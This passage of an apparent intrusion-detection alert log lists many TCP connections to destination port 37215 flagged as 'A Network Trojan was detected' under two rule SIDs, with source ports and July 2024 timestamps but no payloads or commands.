                  Source Port:56298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.998271
                  SID:2829579
                  Source Port:50700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.426882
                  SID:2835222
                  Source Port:35138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.608381
                  SID:2829579
                  Source Port:53492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.870902
                  SID:2835222
                  Source Port:42078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.206417
                  SID:2835222
                  Source Port:44554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.353894
                  SID:2829579
                  Source Port:47282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.367702
                  SID:2829579
                  Source Port:56692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.541812
                  SID:2829579
                  Source Port:44658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.465521
                  SID:2829579
                  Source Port:60844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989759
                  SID:2829579
                  Source Port:36658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.283182
                  SID:2835222
                  Source Port:51082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.741314
                  SID:2835222
                  Source Port:59316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.404911
                  SID:2829579
                  Source Port:36944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.367822
                  SID:2829579
                  Source Port:41880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.880564
                  SID:2835222
                  Source Port:58794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.261102
                  SID:2835222
                  Source Port:52068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.232329
                  SID:2835222
                  Source Port:35922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230856
                  SID:2829579
                  Source Port:37504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.381629
                  SID:2829579
                  Source Port:36052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996817
                  SID:2835222
                  Source Port:44566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.806143
                  SID:2835222
                  Source Port:56346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.300019
                  SID:2835222
                  Source Port:55866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.871352
                  SID:2835222
                  Source Port:49932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.088792
                  SID:2829579
                  Source Port:34820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.529610
                  SID:2829579
                  Source Port:58538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069487
                  SID:2835222
                  Source Port:52642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.611798
                  SID:2829579
                  Source Port:57456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.189850
                  SID:2829579
                  Source Port:45434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.896648
                  SID:2835222
                  Source Port:46676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.578082
                  SID:2829579
                  Source Port:34502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.012219
                  SID:2829579
                  Source Port:37232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.809769
                  SID:2835222
                  Source Port:37908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.569562
                  SID:2835222
                  Source Port:58878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.541927
                  SID:2829579
                  Source Port:44330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.773956
                  SID:2829579
                  Source Port:57462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.970965
                  SID:2835222
                  Source Port:46584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.875137
                  SID:2835222
                  Source Port:39914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.452783
                  SID:2829579
                  Source Port:54816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.437126
                  SID:2829579
                  Source Port:35078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.424443
                  SID:2835222
                  Source Port:36952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.611798
                  SID:2829579
                  Source Port:37376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.340130
                  SID:2835222
                  Source Port:50918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.917695
                  SID:2829579
                  Source Port:52070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.672861
                  SID:2835222
                  Source Port:34664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.818099
                  SID:2829579
                  Source Port:45670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.491951
                  SID:2835222
                  Source Port:54410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.214237
                  SID:2829579
                  Source Port:34532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.562285
                  SID:2835222
                  Source Port:53524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047085
                  SID:2829579
                  Source Port:38266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.098381
                  SID:2835222
                  Source Port:47508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.880980
                  SID:2835222
                  Source Port:37434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.579530
                  SID:2829579
                  Source Port:46524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.781420
                  SID:2835222
                  Source Port:52510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.406060
                  SID:2829579
                  Source Port:42212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081032
                  SID:2835222
                  Source Port:39118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.631590
                  SID:2829579
                  Source Port:52072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.461446
                  SID:2829579
                  Source Port:43962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.179823
                  SID:2835222
                  Source Port:49170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.430084
                  SID:2829579
                  Source Port:49110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629470
                  SID:2835222
                  Source Port:46370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.527963
                  SID:2829579
                  Source Port:42038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854360
                  SID:2835222
                  Source Port:41108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.343615
                  SID:2829579
                  Source Port:53834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.929334
                  SID:2835222
                  Source Port:49750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.057809
                  SID:2829579
                  Source Port:53562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.397688
                  SID:2829579
                  Source Port:55048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2829579
                  Source Port:39496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.613103
                  SID:2829579
                  Source Port:43390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.480663
                  SID:2835222
                  Source Port:42912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.421947
                  SID:2829579
                  Source Port:39042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.095355
                  SID:2835222
                  Source Port:37594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.474823
                  SID:2829579
                  Source Port:36590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.196604
                  SID:2835222
                  Source Port:46718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.882640
                  SID:2829579
                  Source Port:47406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.686036
                  SID:2835222
                  Source Port:35638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.268658
                  SID:2835222
                  Source Port:37910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.868955
                  SID:2835222
                  Source Port:46592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.487883
                  SID:2835222
                  Source Port:52906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.248893
                  SID:2829579
                  Source Port:56852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.120575
                  SID:2835222
                  Source Port:48258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.556731
                  SID:2835222
                  Source Port:40348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2835222
                  Source Port:35306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.164271
                  SID:2835222
                  Source Port:37510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.926462
                  SID:2829579
                  Source Port:59846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.808477
                  SID:2835222
                  Source Port:60280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.772375
                  SID:2829579
                  Source Port:39050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.864679
                  SID:2835222
                  Source Port:56756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.853365
                  SID:2835222
                  Source Port:55300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243364
                  SID:2829579
                  Source Port:35698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.255298
                  SID:2829579
                  Source Port:42436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448470
                  SID:2835222
                  Source Port:43008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.542221
                  SID:2829579
                  Source Port:47892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.343631
                  SID:2835222
                  Source Port:39076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.307540
                  SID:2829579
                  Source Port:41526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.256237
                  SID:2829579
                  Source Port:36318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600239
                  SID:2829579
                  Source Port:34554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.600211
                  SID:2829579
                  Source Port:56152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.586309
                  SID:2835222
                  Source Port:58490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.850354
                  SID:2835222
                  Source Port:41694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.055054
                  SID:2835222
                  Source Port:46562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.301370
                  SID:2835222
                  Source Port:42670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376255
                  SID:2829579
                  Source Port:47360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260349
                  SID:2835222
                  Source Port:42324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2829579
                  Source Port:54970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.435588
                  SID:2829579
                  Source Port:38908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.337218
                  SID:2829579
                  Source Port:48538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.033408
                  SID:2835222
                  Source Port:57782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.879237
                  SID:2829579
                  Source Port:34370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.164034
                  SID:2835222
                  Source Port:44192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.788826
                  SID:2829579
                  Source Port:57354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230940
                  SID:2829579
                  Source Port:51350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.671572
                  SID:2835222
                  Source Port:40174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.909293
                  SID:2835222
                  Source Port:47712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.895681
                  SID:2835222
                  Source Port:57518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.922659
                  SID:2835222
                  Source Port:40616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911509
                  SID:2829579
                  Source Port:33834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.262601
                  SID:2829579
                  Source Port:57398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.856770
                  SID:2835222
                  Source Port:36986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.931726
                  SID:2835222
                  Source Port:58116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.474146
                  SID:2829579
                  Source Port:47092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.459051
                  SID:2829579
                  Source Port:51738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.996552
                  SID:2829579
                  Source Port:49962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.495859
                  SID:2829579
                  Source Port:37212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417840
                  SID:2835222
                  Source Port:40960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.921267
                  SID:2829579
                  Source Port:48898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.451425
                  SID:2829579
                  Source Port:48118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.307876
                  SID:2829579
                  Source Port:41562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.391743
                  SID:2829579
                  Source Port:50146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.716431
                  SID:2835222
                  Source Port:56306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.681794
                  SID:2835222
                  Source Port:49402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.785401
                  SID:2835222
                  Source Port:47634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.758689
                  SID:2835222
                  Source Port:60190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.437596
                  SID:2835222
                  Source Port:36656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.958749
                  SID:2829579
                  Source Port:57258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.540186
                  SID:2835222
                  Source Port:48928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.491395
                  SID:2829579
                  Source Port:42622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.642305
                  SID:2835222
                  Source Port:46646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.749504
                  SID:2829579
                  Source Port:39216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811760
                  SID:2835222
                  Source Port:44056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.638597
                  SID:2829579
                  Source Port:40526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.960962
                  SID:2829579
                  Source Port:53020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.353927
                  SID:2835222
                  Source Port:48542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.159131
                  SID:2829579
                  Source Port:49886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.563036
                  SID:2829579
                  Source Port:46804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.058899
                  SID:2829579
                  Source Port:43072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.549884
                  SID:2829579
                  Source Port:58876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.209282
                  SID:2835222
                  Source Port:36542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.840323
                  SID:2829579
                  Source Port:40714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.105157
                  SID:2829579
                  Source Port:50410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.216208
                  SID:2835222
                  Source Port:44028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.821259
                  SID:2835222
                  Source Port:53592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.228376
                  SID:2835222
                  Source Port:55018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.279248
                  SID:2829579
                  Source Port:38306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.928816
                  SID:2829579
                  Source Port:58244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.872945
                  SID:2835222
                  Source Port:41090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.151006
                  SID:2829579
                  Source Port:33560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.642305
                  SID:2835222
                  Source Port:53222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.180841
                  SID:2835222
                  Source Port:36292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.450144
                  SID:2835222
                  Source Port:56808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.856235
                  SID:2829579
                  Source Port:55190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.216677
                  SID:2835222
                  Source Port:43280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.004303
                  SID:2829579
                  Source Port:58710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2835222
                  Source Port:57822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.879790
                  SID:2829579
                  Source Port:60372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.427022
                  SID:2829579
                  Source Port:49994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.600329
                  SID:2835222
                  Source Port:58120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430208
                  SID:2835222
                  Source Port:52694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.925290
                  SID:2829579
                  Source Port:60646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2829579
                  Source Port:54878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.999483
                  SID:2835222
                  Source Port:49498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.303785
                  SID:2835222
                  Source Port:56014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.587332
                  SID:2829579
                  Source Port:46130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.837578
                  SID:2835222
                  Source Port:57110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.012569
                  SID:2835222
                  Source Port:34398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.350024
                  SID:2829579
                  Source Port:42860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.985785
                  SID:2835222
                  Source Port:49688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981659
                  SID:2835222
                  Source Port:35144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.631405
                  SID:2835222
                  Source Port:59724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.117874
                  SID:2829579
                  Source Port:55572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.167933
                  SID:2829579
                  Source Port:57892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.522434
                  SID:2835222
                  Source Port:51430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.294372
                  SID:2835222
                  Source Port:35982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.980831
